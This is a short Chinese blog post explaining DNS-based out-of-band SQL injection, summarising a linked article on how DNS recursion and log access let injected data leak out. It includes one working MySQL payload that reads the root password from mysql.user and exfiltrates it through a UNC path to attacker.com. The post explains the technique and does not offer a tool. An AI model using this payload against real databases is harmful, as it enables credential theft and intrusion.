另一种的SQL注入和DNS结合的技巧
2024-10-18 16:36:55
这个技巧有些另类,当时某业界大佬提点了一下。当时真的真的没有理解到那种程度,现在可能也是没有理解到,但是我会努力。
本文章是理解于:http://netsecurity.51cto.com/art/201503/469621.htm
链接中的文章主要说的是什么?
先愉快的介绍了DNS工作原理,注意其中有一个术语叫做递归。这个是DNS服务关键的一部分。
这种攻击方式需要提前能查看DNS日志,利用SQL注入语句返回信息,迫使DNS递归,然后DNS日志的记录。
日志中就有SQL注入返回信息了。
例如:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root'
LIMIT 1),'.attacker.com\\foobar'));
返回了:\\\\返回值(password).attacker.com\\foobar。触发了DNS递归,导致日志记录。
最新文章
- 自动创建WIN32下多级子目录的C++封装类
- css-@keyframes动画
- App创业者必看:如何选择免费数据分析平台
- linux命令(10)使用kill杀死含有指定关键字的进程
- 关于MongoDb Replica Set的故障转移集群——实战篇
- vc++ 最小化到托盘的详细实现
- eclipse ldt update resource
- 【学习总结】Git学习-参考廖雪峰老师教程-总
- jquery跨域方法
- centos 7 linux 安装与卸载 jdk 7
- springboot redis(单机/集群)
- LanProxy 内网映射穿透
- Exception的ToString()方法究竟返回的是什么
- 常用CTPN、CRNN文本检测识别框架
- select min from 连接
- UVaLive 3490 Generator (KMP + DP + Gauss)
- iOS AppIcon尺寸
- IDEA / WebStorm / PhpStorm 添加jQuery自动提示,自动补全,提醒文档
- Visual Studio 编译信息细度显示设置
- 提高eclipse使用效率(一)--使用快捷键